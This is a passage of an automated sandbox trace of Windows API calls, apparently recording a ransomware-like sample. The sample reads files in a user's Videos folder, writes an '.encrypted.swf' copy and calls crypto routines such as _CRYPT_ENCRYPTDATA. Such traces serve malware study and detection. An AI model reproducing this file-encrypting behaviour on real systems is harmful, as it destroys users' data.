RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.890] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\8y1trplfo1lpoj0q.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.891] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.892] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.892] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x35ac, lpOverlapped=0x0) returned 1 [0042.894] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35ac) returned 0xac2018 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0042.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35ac) returned 0xac55d0 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35ac) returned 0xac2018 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.895] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35ac) returned 0xac2018 [0042.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0042.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35ac) returned 0xac8b88 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.898] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.898] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.899] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.899] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.900] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 